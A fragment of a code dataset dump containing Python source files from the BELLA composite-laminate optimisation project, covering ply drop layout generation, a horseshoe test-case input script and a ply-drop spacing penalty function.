"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreate ply drop layout\r\n\r\nAll stacking sequences are subsets from the stacking sequence of the thickest\r\npanels.\r\n\r\n- read_pdls_excel\r\n reads ply drop layout inputs in Excel file\r\n\r\n- check_pdls_ini\r\n checks that the initial ply drop layouts have the correct numbers of panels\r\n and numbers of plies per panel\r\n\r\n- create_initial_pdls\r\n creates ply drop layouts for a blended structure\r\n\r\n- create_initial_pdl\r\n creates a ply drop layout for a blended structure\r\n\r\n\"\"\"\r\nimport sys\r\nimport time\r\nimport pandas as pd\r\nimport numpy as np\r\nimport numpy.matlib\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\nfrom src.BELLA.parameters import Parameters\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.obj_function import ObjFunction\r\nfrom src.BELLA.divide_panels import divide_panels\r\nfrom src.BELLA.pdl_group import randomly_pdl_guide\r\nfrom src.BELLA.pdl_tools import global_pdl_from_local_pdl\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing\r\nfrom src.divers.pretty_print import print_list_ss\r\n#from src.guidelines.ply_drop_spacing import indic_violation_ply_drop_spacing\r\n#from src.guidelines.one_stack import check_ply_drop_rules\r\n\r\ndef read_pdls_excel(filename):\r\n \"\"\"\r\n reads ply drop layout inputs in Excel file\r\n \"\"\"\r\n pdls = []\r\n ind_pdl = 1\r\n while True:\r\n try:\r\n pdl = pd.read_excel(\r\n filename, sheet_name='pdl' + str(ind_pdl), dtype='int',\r\n header=None, )\r\n except:\r\n break\r\n finally:\r\n ind_pdl += 1\r\n pdls.append(np.array(pdl))\r\n ind_pdl -= 2\r\n print(' ' + str(ind_pdl) + ' intial ply-drop layouts read.')\r\n return pdls\r\n\r\n\r\ndef check_pdls_ini(multipanel, pdls_ini):\r\n \"\"\"\r\n checks that the initial ply drop layouts have the correct numbers of panels\r\n and numbers of plies per panel\r\n \"\"\"\r\n for pdl in pdls_ini:\r\n if pdl.shape[0] != multipanel.reduced.n_panels:\r\n print(pdl.shape[0], multipanel.reduced.n_panels)\r\n raise Exception(\"\"\"\r\nInitial ply drop layout with wrong number of panels\"\"\")\r\n for ind_panel, pdl_panel in enumerate(pdl):\r\n if pdl_panel[pdl_panel != -1].size \\\r\n != multipanel.reduced.panels[ind_panel].n_plies:\r\n raise Exception(\"\"\"\r\nInitial ply drop layout with wrong number of plies per panel\"\"\")\r\n print(' Sizes of the intial ply-drop layouts checked.')\r\n return None\r\n\r\n\r\ndef create_initial_pdls(multipanel, constraints, parameters, obj_func_param):\r\n \"\"\"\r\n creates ply drop layouts for a blended structure with no duplicates\r\n \"\"\"\r\n t_ini= time.time()\r\n\r\n pdls_perfect = np.zeros((\r\n parameters.n_ini_ply_drops,\r\n multipanel.reduced.n_panels,\r\n multipanel.n_plies_max), int)\r\n pdls_imperfect = np.zeros((\r\n parameters.n_ini_ply_drops,\r\n multipanel.reduced.n_panels,\r\n multipanel.n_plies_max), int)\r\n\r\n p_pdls_imperfect = np.zeros((parameters.n_ini_ply_drops,), dtype=float)\r\n\r\n ind_imperfect = 0\r\n ind_perfect = 0\r\n t_ini = time.time()\r\n elapsed_time = 0\r\n\r\n\r\n while ind_perfect < parameters.n_ini_ply_drops\\\r\n and elapsed_time < parameters.time_limit_all_pdls:\r\n\r\n# print('ind_perfect', ind_perfect)\r\n# print('ind_imperfect', ind_imperfect)\r\n\r\n new_pdl = create_initial_pdl(multipanel, constraints, parameters,\r\n obj_func_param)\r\n\r\n# print('new_pdl')\r\n# print_list_ss(new_pdl)\r\n\r\n# if constraints.sym and multipanel.has_middle_ply:\r\n# pdl_after=np.flip(new_pdl[:, 1:], axis=1)\r\n# elif constraints.sym:\r\n# pdl_after=np.flip(new_pdl[:, :], axis=1)\r\n# else:\r\n# pdl_after=None\r\n\r\n new_penalty_spacing = calc_penalty_spacing(\r\n pdl=new_pdl,\r\n pdl_after=None,\r\n multipanel=multipanel,\r\n obj_func_param=obj_func_param,\r\n constraints=constraints,\r\n on_blending_strip=True)\r\n\r\n elapsed_time = time.time() - t_ini\r\n\r\n # Store the new pdl if it is perfect (no violation of manufacturing\r\n # constraint) or if it is among the parameters.n_ini_ply_drops best\r\n # unmanufacturable solutions found so far\r\n if new_penalty_spacing == 0:\r\n\r\n # To remove duplicates\r\n is_double = False\r\n for ind in range(ind_perfect):\r\n if (new_pdl - pdls_perfect[ind] == 0).all():\r\n is_double = True\r\n break\r\n if is_double:\r\n continue\r\n pdls_perfect[ind_perfect] = new_pdl\r\n ind_perfect += 1\r\n\r\n else:\r\n # To only keep the imperfect pdl with the smallest penalties\r\n if ind_imperfect >= parameters.n_ini_ply_drops:\r\n if new_penalty_spacing < max(p_pdls_imperfect):\r\n # To remove duplicates\r\n is_double = False\r\n for ind in range(ind_imperfect):\r\n if np.allclose(new_pdl, pdls_imperfect[ind]):\r\n is_double = True\r\n break\r\n if is_double:\r\n continue\r\n #print('is_double', is_double)\r\n indexx = np.argmin(p_pdls_imperfect)\r\n pdls_imperfect[indexx] = new_pdl\r\n p_pdls_imperfect[indexx] = new_penalty_spacing\r\n else:\r\n # To remove duplicates\r\n is_double = False\r\n for ind in range(ind_imperfect):\r\n if np.allclose(new_pdl, pdls_imperfect[ind]):\r\n is_double = True\r\n break\r\n if is_double:\r\n continue\r\n #print('is_double', is_double)\r\n# print(new_pdl)\r\n# print(ind_imperfect)\r\n# print(pdls_imperfect.shape)\r\n pdls_imperfect[ind_imperfect] = new_pdl\r\n p_pdls_imperfect[ind_imperfect] = new_penalty_spacing\r\n ind_imperfect += 1\r\n\r\n # if the time limit is reached\r\n if elapsed_time >= parameters.time_limit_all_pdls:\r\n\r\n pdls_imperfect = pdls_imperfect[:ind_imperfect]\r\n p_pdls_imperfect = p_pdls_imperfect[:ind_imperfect]\r\n# print('pdls_perfect', pdls_perfect)\r\n# print('pdls_imperfect', pdls_imperfect)\r\n\r\n if not ind_imperfect + ind_perfect:\r\n raise Exception(\"\"\"\r\nNo conform ply drop layout can be generated.\r\nToo many ply drops between two adjacent panels.\"\"\")\r\n\r\n # add the non-manufacturable ply drop layouts\r\n for ind in range(ind_perfect, parameters.n_ini_ply_drops):\r\n indexx = np.argmin(p_pdls_imperfect)\r\n pdls_perfect[ind] = pdls_imperfect[indexx]\r\n p_pdls_imperfect[indexx] = 10e6\r\n\r\n print(' ' + str(ind_perfect) \\\r\n + ' feasible intial ply-drop layouts generated.')\r\n print(' ' + str(parameters.n_ini_ply_drops - ind_perfect) \\\r\n + ' infeasible intial ply-drop layouts generated.')\r\n\r\n return pdls_perfect\r\n\r\n # if enough manufacturable ply drop layouts have been found\r\n print(' ' + str(parameters.n_ini_ply_drops) \\\r\n + ' feasible intial ply-drop layouts generated.')\r\n\r\n return pdls_perfect\r\n\r\ndef create_initial_pdl(multipanel, constraints, parameters, obj_func_param):\r\n \"\"\"\r\n creates a ply drop layout for a blended structure\r\n\r\n - obj_func_param: objective function parameters\r\n \"\"\"\r\n if constraints.sym:\r\n pdl_before_cummul = [None]*(multipanel.reduced.n_groups + 1)\r\n\r\n for index_pdl in range(len(pdl_before_cummul)):\r\n pdl_before_cummul[index_pdl] = None\r\n\r\n # plies for covering rule (including damage tolerance)\r\n if constraints.n_covering == 1:\r\n pdl_before_cummul[0] = np.matlib.repmat(\r\n np.array([0], dtype=int), multipanel.reduced.n_panels, 1)\r\n elif constraints.n_covering == 2:\r\n pdl_before_cummul[0] = np.matlib.repmat(\r\n np.array([0, 1], dtype=int), multipanel.reduced.n_panels, 1)\r\n\r\n for inner_step in range(multipanel.reduced.n_groups):\r\n\r\n last_group = bool(inner_step == multipanel.reduced.n_groups - 1)\r\n\r\n covering_top = False\r\n\r\n # create group ply drop layouts\r\n n_ply_drops = multipanel.calc_ply_drops(inner_step)\r\n my_pdl = randomly_pdl_guide(\r\n multipanel=multipanel,\r\n boundaries=multipanel.reduced.boundaries,\r\n has_middle_ply=multipanel.has_middle_ply,\r\n middle_ply_indices=multipanel.reduced.middle_ply_indices,\r\n n_ply_drops=n_ply_drops,\r\n n_max=multipanel.reduced.n_plies_per_group[inner_step],\r\n parameters=parameters,\r\n obj_func_param=obj_func_param,\r\n constraints=constraints,\r\n pdl_before=pdl_before_cummul[inner_step],\r\n last_group=last_group,\r\n covering_top=covering_top)\r\n pdl_before_cummul[inner_step + 1] = my_pdl[0]\r\n\r\n return global_pdl_from_local_pdl(\r\n multipanel, constraints.sym, pdl_before_cummul)\r\n\r\n pdl_before_cummul = [None]*(multipanel.reduced.n_groups + 2)\r\n pdl_after_cummul = [None]*(multipanel.reduced.n_groups + 2)\r\n for index_pdl in range(len(pdl_before_cummul)):\r\n pdl_before_cummul[index_pdl] = None\r\n pdl_after_cummul[index_pdl] = None\r\n\r\n if constraints.n_covering == 1:\r\n pdl_before_cummul[0] = np.matlib.repmat(\r\n np.array([0], dtype=int), multipanel.reduced.n_panels, 1)\r\n pdl_after_cummul[1] = np.matlib.repmat(\r\n np.array([0], dtype=int), multipanel.reduced.n_panels, 1)\r\n elif constraints.n_covering == 2:\r\n pdl_before_cummul[0] = np.matlib.repmat(\r\n np.array([0, 1], dtype=int), multipanel.reduced.n_panels, 1)\r\n pdl_after_cummul[1] = np.matlib.repmat(\r\n np.array([0, 1], dtype=int), multipanel.reduced.n_panels, 1)\r\n\r\n for inner_step in range(multipanel.reduced.n_groups):\r\n last_group = bool(inner_step == multipanel.reduced.n_groups - 1)\r\n\r\n if inner_step % 2 == 0:\r\n pdl_before = pdl_before_cummul[inner_step]\r\n pdl_after = None\r\n else:\r\n pdl_before = None\r\n pdl_after = pdl_after_cummul[inner_step]\r\n\r\n covering_top = False\r\n covering_bottom = False\r\n\r\n # create group ply drop layouts\r\n n_ply_drops = multipanel.calc_ply_drops(inner_step)\r\n my_pdl = randomly_pdl_guide(\r\n multipanel=multipanel,\r\n boundaries=multipanel.reduced.boundaries,\r\n n_ply_drops=n_ply_drops,\r\n n_max=multipanel.reduced.n_plies_per_group[inner_step],\r\n pdl_before=pdl_before,\r\n pdl_after=pdl_after,\r\n last_group=last_group,\r\n parameters=parameters,\r\n obj_func_param=obj_func_param,\r\n constraints=constraints,\r\n covering_top=covering_top,\r\n covering_bottom=covering_bottom)\r\n# print(my_pdl)\r\n if inner_step % 2 == 0:\r\n pdl_before_cummul[inner_step + 2] = my_pdl[0]\r\n else:\r\n pdl_after_cummul[inner_step + 2] = my_pdl[0]\r\n\r\n return global_pdl_from_local_pdl(\r\n multipanel, constraints.sym, pdl_before_cummul, pdl_after_cummul)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print('\\n*** Test for the function create_initial_pdl ***')\r\n constraints = Constraints(\r\n sym=True,\r\n dam_tol=False,\r\n covering=False,\r\n pdl_spacing=True,\r\n min_drop=2)\r\n parameters = Parameters(constraints=constraints)\r\n obj_func_param = ObjFunction(constraints)\r\n n_plies_target1 = 21\r\n n_plies_target2 = 19\r\n n_plies_target3 = 18\r\n n_plies_target4 = 16\r\n panel_1 = Panel(ID=1,\r\n n_plies=n_plies_target1,\r\n constraints=constraints,\r\n neighbour_panels=[2])\r\n panel_2 = Panel(ID=2,\r\n n_plies=n_plies_target2,\r\n constraints=constraints,\r\n neighbour_panels=[1, 3])\r\n panel_3 = Panel(ID=3,\r\n n_plies=n_plies_target3,\r\n constraints=constraints,\r\n neighbour_panels=[2, 4])\r\n panel_4 = Panel(ID=4,\r\n n_plies=n_plies_target4,\r\n constraints=constraints,\r\n neighbour_panels=[3])\r\n multipanel = MultiPanel(panels=[panel_1, panel_2, panel_3, panel_4])\r\n multipanel.from_mp_to_blending_strip(constraints)\r\n divide_panels(multipanel, parameters, constraints)\r\n pdl_ini = create_initial_pdl(\r\n multipanel,\r\n constraints,\r\n parameters,\r\n obj_func_param)\r\n print(pdl_ini)\r\n\r\n"
},
{
"alpha_fraction": 0.49507978558540344,
"alphanum_fraction": 0.5832616686820984,
"avg_line_length": 32.76744079589844,
"blob_id": "b864ea0d9eb7c2a3ac1401bfd8650f3adc19eb61",
"content_id": "0e38d28e7dd3f64f9739f2386eebaccad434cb54",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10467,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 301,
"path": "/input-files/create_input_file_horseshoe2.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis script saves the input file for the feasible horseshoe problem.\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\n\r\nimport sys\r\nimport pandas as pd\r\nimport numpy as np\r\nimport numpy.matlib\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.obj_function import ObjFunction\r\nfrom src.BELLA.materials import Material\r\nfrom src.BELLA.save_set_up import save_constraints_BELLA\r\nfrom src.BELLA.save_set_up import save_multipanel\r\nfrom src.BELLA.save_set_up import save_objective_function_BELLA\r\nfrom src.BELLA.save_set_up import save_materials\r\nfrom src.guidelines.one_stack import check_lay_up_rules\r\nfrom src.guidelines.one_stack import check_ply_drop_rules\r\nfrom src.divers.excel import delete_file, autofit_column_widths\r\n\r\nsheet = 'horseshoe2'\r\nfilename_input = '/BELLA/input-files/SST.xlsx'\r\nfilename_res = 'input_file_' + sheet + '.xlsx'\r\n\r\n# check for authorisation before overwriting\r\ndelete_file(filename_res)\r\n\r\n# number of panels\r\nn_panels = 18\r\n\r\n### Design guidelines ---------------------------------------------------------\r\n\r\nconstraints_set = 'C0'\r\nconstraints_set = 'C1'\r\n\r\n## lay-up rules\r\n\r\n# set of admissible fibre orientations\r\nset_of_angles = np.array([-45, 0, 45, 90], dtype=int)\r\nset_of_angles = np.array([\r\n -45, 0, 45, 90, +30, -30, +60, -60, 15, -15, 75, -75], dtype=int)\r\n\r\nsym = True # symmetry rule\r\noopo = False # out-of-plane orthotropy requirements\r\n\r\nif constraints_set == 'C0':\r\n bal = False # balance rule\r\n rule_10_percent = False # 10% rule\r\n diso = False # disorientation rule\r\n contig = False # contiguity rule\r\n dam_tol = False # damage-tolerance rule\r\nelse:\r\n bal = True\r\n rule_10_percent = True\r\n diso = True\r\n contig = True\r\n dam_tol = True\r\n\r\nrule_10_Abdalla = True # 10% rule restricting LPs instead of ply percentages\r\npercent_Abdalla = 10 # percentage limit for the 10% rule applied on LPs\r\ncombine_45_135 = True # True if restriction on +-45 plies combined for 10% rule\r\npercent_0 = 10 # percentage used in the 10% rule for 0 deg plies\r\npercent_45 = 0 # percentage used in the 10% rule for +45 deg plies\r\npercent_90 = 10 # percentage used in the 10% rule for 90 deg plies\r\npercent_135 = 0 # percentage used in the 10% rule for -45 deg plies\r\npercent_45_135 =10 # percentage used in the 10% rule for +-45 deg plies\r\ndelta_angle = 45 # maximum angle difference for adjacent plies\r\nn_contig = 5 # maximum number of adjacent plies with the same fibre orientation\r\ndam_tol_rule = 1 # type of damage tolerance rule\r\n\r\n## ply-drop rules\r\n\r\ncovering = True # covering rule\r\nn_covering = 1 # number of plies ruled by covering rule at laminate surfaces\r\npdl_spacing = True # ply drop spacing rule\r\nmin_drop = 2 # Minimum number of continuous plies between ply drops\r\n\r\nconstraints = Constraints(\r\n sym=sym,\r\n bal=bal,\r\n oopo=oopo,\r\n dam_tol=dam_tol,\r\n dam_tol_rule=dam_tol_rule,\r\n covering=covering,\r\n n_covering=n_covering,\r\n rule_10_percent=rule_10_percent,\r\n rule_10_Abdalla=rule_10_Abdalla,\r\n percent_Abdalla=percent_Abdalla,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n diso=diso,\r\n contig=contig,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n set_of_angles=set_of_angles,\r\n min_drop=min_drop,\r\n pdl_spacing=pdl_spacing)\r\n\r\n### Objective function parameters ---------------------------------------------\r\n\r\n# Coefficient for the 10% rule penalty\r\ncoeff_10 = 1\r\n# Coefficient for the contiguity constraint penalty\r\ncoeff_contig = 1\r\n# Coefficient for the disorientation constraint penalty\r\ncoeff_diso = 10\r\n# Coefficient for the out-of-plane orthotropy penalty\r\ncoeff_oopo = 1\r\n# Coefficient for the ply drop spacing guideline penalty\r\ncoeff_spacing = 1\r\n\r\n# Lamination-parameter weightings in panel objective functions\r\n# (In practice these weightings can be different for each panel)\r\noptimisation_type = 'AD'\r\nif optimisation_type == 'A':\r\n if all(elem in {0, +45, -45, 90} for elem in constraints.set_of_angles):\r\n lampam_weightings = np.array([1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0])\r\n else:\r\n lampam_weightings = np.array([1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0])\r\nelif optimisation_type == 'D':\r\n if all(elem in {0, +45, -45, 90} for elem in constraints.set_of_angles):\r\n lampam_weightings = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n else:\r\n lampam_weightings = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1])\r\nelif optimisation_type == 'AD':\r\n if all(elem in {0, +45, -45, 90} for elem in constraints.set_of_angles):\r\n lampam_weightings = np.array([1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n else:\r\n lampam_weightings = np.array([1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1])\r\n\r\n## Multi-panel objective function\r\n\r\n# Weightings of the panels in the multi-panel objecive function\r\npanel_weightings = np.ones((n_panels,), float)\r\n\r\nobj_func_param = ObjFunction(\r\n constraints=constraints,\r\n coeff_contig=coeff_contig,\r\n coeff_diso=coeff_diso,\r\n coeff_10=coeff_10,\r\n coeff_oopo=coeff_oopo,\r\n coeff_spacing=coeff_spacing)\r\n\r\n### Material properties -------------------------------------------------------\r\n\r\n# Elastic modulus in the fibre direction in Pa\r\nE11 = 20.5/1.45038e-10 # 141 GPa\r\n# Elastic modulus in the transverse direction in Pa\r\nE22 = 1.31/1.45038e-10 # 9.03 GPa\r\n# Poisson's ratio relating transverse deformation and axial loading (-)\r\nnu12 = 0.32\r\n# In-plane shear modulus in Pa\r\nG12 = 0.62/1.45038e-10 # 4.27 GPa\r\n# Density in g/m2\r\ndensity_area = 300.5\r\n# Ply thickness in m\r\nply_t = (25.40/1000)*0.0075 # 0.191 mmm\r\n\r\nmaterials = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n\r\n### Multi-panel composite laminate layout -------------------------------------\r\n\r\n# panel IDs\r\nID = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18]\r\n\r\n# panel number of plies\r\nn_plies_per_panel = [32, 28, 20, 18, 16, 22, 18, 24, 38,\r\n 34, 30, 28, 22, 18, 24, 30, 18, 22]\r\n# panels adjacency\r\nneighbour_panels = {\r\n 1 : [2, 9],\r\n 2 : [1, 3, 6, 10],\r\n 3 : [2, 4, 6],\r\n 4 : [3, 5, 7],\r\n 5 : [4, 8],\r\n 6 : [2, 3, 7],\r\n 7 : [4, 6, 8],\r\n 8 : [5, 7],\r\n 9 : [1, 10, 11],\r\n 10 : [2, 9, 12],\r\n 11 : [9, 12],\r\n 12 : [10, 11, 13, 16],\r\n 13 : [12, 14, 16],\r\n 14 : [13, 15, 17],\r\n 15 : [14, 18],\r\n 16 : [12, 13, 17],\r\n 17 : [14, 16, 18],\r\n 18 : [15, 17]}\r\n\r\n# boundary weights\r\nboundary_weights = {(1, 2) : 0.610,\r\n (1, 9) : 0.457,\r\n (2, 3) : 0.305,\r\n (2, 6) : 0.305,\r\n (2, 10) : 0.457,\r\n (3, 4) : 0.305,\r\n (3, 6) : 0.508,\r\n (4, 5) : 0.305,\r\n (4, 7) : 0.508,\r\n (5, 8) : 0.508,\r\n (6, 7) : 0.305,\r\n (7, 8) : 0.305,\r\n (9, 10) : 0.610,\r\n (9, 11) : 0.457,\r\n (10, 12) : 0.457,\r\n (11, 12) : 0.610,\r\n (12, 13) : 0.305,\r\n (12, 16) : 0.305,\r\n (13, 14) : 0.305,\r\n (13, 16) : 0.508,\r\n (14, 15) : 0.305,\r\n (14, 17) : 0.508,\r\n (15, 18) : 0.508,\r\n (16, 17) : 0.305,\r\n (17, 18) : 0.305}\r\n\r\n# panel length in the x-direction (m)\r\nlength_x = (25.40/1000)*np.array([18, 18, 20, 20, 20, 20, 20, 20,\r\n 18, 18, 18, 18, 20, 20, 20, 20, 20, 20])\r\n\r\n# panel length in the y-direction (m)\r\nlength_y = (25.40/1000)*np.array([24, 24, 12, 12, 12, 12, 12, 12,\r\n 24, 24, 24, 24, 12, 12, 12, 12, 12, 12])\r\n\r\n# 1 lbf/in = 0.175127 N/mm\r\n# panel loading per unit width in the x-direction in N/m\r\nN_x = 175.127*np.array([700, 375, 270, 250, 210, 305, 290, 600,\r\n 1100, 900, 375, 400, 330, 190, 300, 815, 320, 300])\r\n\r\n# panel loading per unit width in the y-direction in N/m\r\nN_y = 175.127*np.array([400, 360, 325, 200, 100, 360, 195, 480,\r\n 600, 400, 525, 320, 330, 205, 610, 1000, 180, 410])\r\n\r\n\r\nsst = pd.read_excel(filename_input, sheet_name=sheet).fillna(-1)\r\nsst = np.array(sst, int).T\r\nsst = np.hstack((sst, np.flip(sst, axis=1)))\r\n\r\nn_plies_2_ss = dict()\r\nn_plies_2_lampam = dict()\r\nn_plies_2_sst = dict()\r\n\r\nfor stack_sst in sst:\r\n stack = np.copy(stack_sst)\r\n for ind_ply in range(38)[::-1]:\r\n if stack[ind_ply] == -1:\r\n stack = np.delete(stack, ind_ply)\r\n n_plies_2_sst[len(stack)] = stack_sst\r\n n_plies_2_ss[len(stack)] = stack\r\n n_plies_2_lampam[len(stack)] = calc_lampam(stack)\r\n\r\nsst = np.array([n_plies_2_sst[n] for n in n_plies_per_panel])\r\n\r\npanels = []\r\nfor ind_panel in range(n_panels):\r\n panels.append(Panel(\r\n ID=ID[ind_panel],\r\n lampam_target=n_plies_2_lampam[n_plies_per_panel[ind_panel]],\r\n lampam_weightings=lampam_weightings,\r\n n_plies=n_plies_per_panel[ind_panel],\r\n length_x=length_x[ind_panel],\r\n length_y=length_y[ind_panel],\r\n N_x=N_x[ind_panel],\r\n N_y=N_y[ind_panel],\r\n weighting=panel_weightings[ind_panel],\r\n neighbour_panels=neighbour_panels[ID[ind_panel]],\r\n constraints=constraints))\r\n\r\nmultipanel = MultiPanel(panels)\r\nmultipanel.filter_target_lampams(constraints, obj_func_param)\r\nmultipanel.filter_lampam_weightings(constraints, obj_func_param)\r\n\r\n### Checks for feasibility of the multi-panel composite layout ----------------\r\n\r\n#check_ply_drop_rules(sst, multipanel, constraints, reduced=False)\r\n\r\nfor stack in n_plies_2_ss.values():\r\n check_lay_up_rules(stack, constraints,\r\n no_ipo_check=True, no_bal_check=True)\r\n\r\n### Save data -----------------------------------------------------------------\r\n\r\nsave_multipanel(filename_res, multipanel, obj_func_param, calc_penalties=True,\r\n constraints=constraints, sst=sst)\r\nsave_constraints_BELLA(filename_res, constraints)\r\nsave_objective_function_BELLA(filename_res, obj_func_param)\r\nsave_materials(filename_res, materials)\r\nautofit_column_widths(filename_res)\r\n\r\n"
},
{
"alpha_fraction": 0.5216606259346008,
"alphanum_fraction": 0.5462093949317932,
"avg_line_length": 30.57647132873535,
"blob_id": "c765a4e39df3574f15d9d3bf707b9e6ae58ef1d2",
"content_id": "d8fdd5e997c74dca9dd36e44d45fb48d658b5640",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5540,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 170,
"path": "/src/guidelines/ply_drop_spacing.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\n- calc_penalty_spacing_1ss\r\n calculates the ply drop spacing penalty of a panel regarding one of its\r\n boundary\r\n\r\n- calc_penalty_spacing\r\n calculates the penalties of a ply drop layout for the ply-drop spacing rule\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.format_pdl import reduce_for_guide_based_blending\r\n\r\n\r\ndef calc_penalty_spacing(\r\n pdl,\r\n multipanel,\r\n constraints,\r\n obj_func_param=None,\r\n on_blending_strip=False,\r\n pdl_before=None,\r\n pdl_after=None):\r\n \"\"\"\r\n calculates the penalties of a ply drop layout for the ply-drop spacing rule\r\n\r\n INPUTS\r\n\r\n - multipanel: multi-panel structure\r\n - pdl: matrix of ply drop layouts of the current group\r\n - pdl_before: matrix of ply drop layout of the previous group\r\n - pdl_after: matrix of ply drop layout of the group placed afterwards\r\n - constraints: lay-up design guidelines\r\n - obj_func_param: objective function parameters\r\n - on_blending_strip: to be calculated on blending strip\r\n \"\"\"\r\n if not constraints.pdl_spacing:\r\n return 0\r\n\r\n ### blending strip --------------------------------------------------------\r\n if on_blending_strip:\r\n\r\n if pdl_before is None:\r\n pdl_before = np.zeros((multipanel.reduced.n_panels, 0))\r\n if pdl_after is None:\r\n pdl_after = np.zeros((multipanel.reduced.n_panels, 0))\r\n\r\n penalty_spacing = 0\r\n\r\n for ind_panel1, ind_panel2 in multipanel.reduced.boundaries:\r\n\r\n if pdl[ind_panel1] is None or pdl[ind_panel2] is None \\\r\n or pdl[ind_panel1].size == 1 or pdl[ind_panel2].size == 1:\r\n continue\r\n\r\n # stack the ply drop layouts before/current/after\r\n layout1 = np.hstack((\r\n pdl_before[ind_panel1],\r\n pdl[ind_panel1],\r\n pdl_after[ind_panel1]))\r\n layout2 = np.hstack((\r\n pdl_before[ind_panel2],\r\n pdl[ind_panel2],\r\n pdl_after[ind_panel2]))\r\n\r\n # delete plies that does not cover the panels\r\n to_keep = [layout1[ind] != -1 or layout1[ind] != layout2[ind]\r\n for ind in range(layout1.size)]\r\n layout1 = layout1[to_keep]\r\n if -1 not in layout1:\r\n layout1 = layout2[to_keep]\r\n\r\n # print('ind_panel1, ind_panel2', ind_panel1, ind_panel2)\r\n # print(layout1)\r\n\r\n penalty_spacing += (multipanel.reduced.boundary_weights[\r\n (ind_panel1, ind_panel2)] * calc_penalty_spacing_1ss(\r\n layout1, constraints.min_drop))\r\n\r\n return penalty_spacing\r\n\r\n ### multi-panel -----------------------------------------------------------\r\n if not hasattr(multipanel, 'reduced'):\r\n multipanel.from_mp_to_blending_strip(constraints, n_plies_ref_panel=1)\r\n\r\n reduced_pdl = reduce_for_guide_based_blending(multipanel, pdl)\r\n\r\n# print('reduced_pdl.shape', reduced_pdl.shape)\r\n return calc_penalty_spacing(\r\n pdl=reduced_pdl,\r\n multipanel=multipanel,\r\n constraints=constraints,\r\n obj_func_param=obj_func_param,\r\n on_blending_strip=True,\r\n pdl_before=pdl_before,\r\n pdl_after=pdl_after)\r\n\r\n\r\ndef is_same_pdl(pdl1, pdl2, ind_ref, thick_to_thin=True):\r\n \"\"\"\r\n returns True if pdl1 == pdl2\r\n \"\"\"\r\n if thick_to_thin:\r\n for index in range(ind_ref):\r\n if pdl1[index] is None:\r\n pass\r\n elif (pdl1[index] != pdl2[index]).any():\r\n return False\r\n return True\r\n\r\n for index in range(len(pdl1)):\r\n if pdl1[index] is None:\r\n pass\r\n elif (pdl1[index] != pdl2[index]).any():\r\n return False\r\n return True\r\n\r\n\r\ndef calc_penalty_spacing_1ss(ss, min_drop):\r\n \"\"\"\r\n returns the penalty for the ply drop spacing rule by considering the\r\n stacking sequence in one panel in reference to one of its neighboor panel\r\n\r\n Sum of the missing continuous plies between ply drops divided by the length\r\n of the ply drop layout\r\n\r\n - min_drop: minimum number of continuous plies required between two block\r\n of dropped plies\r\n \"\"\"\r\n penal = 0\r\n # indentify index of the successive -1 elements in the array\r\n index1 = 0\r\n while index1 < ss.size:\r\n if ss[index1] == -1:\r\n break\r\n else:\r\n index1 += 1\r\n index2 = index1 + 1\r\n while index2 < ss.size:\r\n while index2 < ss.size:\r\n if ss[index2] == -1:\r\n break\r\n else:\r\n index2 += 1\r\n # test for the ply drop spacing condition\r\n if index2 < ss.size and index2 - index1 - 1 < min_drop:\r\n penal += min_drop - (index2 - index1 - 1)\r\n index1 = index2\r\n index2 += 1\r\n return penal / ss.size\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n\r\n print('\\n*** Test for the function calc_penalty_spacing_1ss ***')\r\n ss = np.array([-1, 0, 0, -1, 0., 1., -1., 2., -1., 4., -1, 1., -1])\r\n min_drop = 2\r\n p = calc_penalty_spacing_1ss(ss, min_drop)\r\n print(ss)\r\n print(f'Penalty for the ply drop spacing rule spacing {p}')\r\n\r\n print(calc_penalty_spacing_1ss(np.array([\r\n 1., 2., 3., 4., 5., 6.,-1., 7., 8., 9., 10., -1.,\r\n -1.,11.,11.,-1.,-1.,10.,\r\n 9., 8., 7.,-1., 6., 5., 4., 3., 2., 1.]), 2))\r\n\r\n"
},
{
"alpha_fraction": 0.5782715082168579,
"alphanum_fraction": 0.5852017998695374,
"avg_line_length": 43.425926208496094,
"blob_id": "64fa112c2c29bd2b27a5b2bad3ef0ca204d12e29",
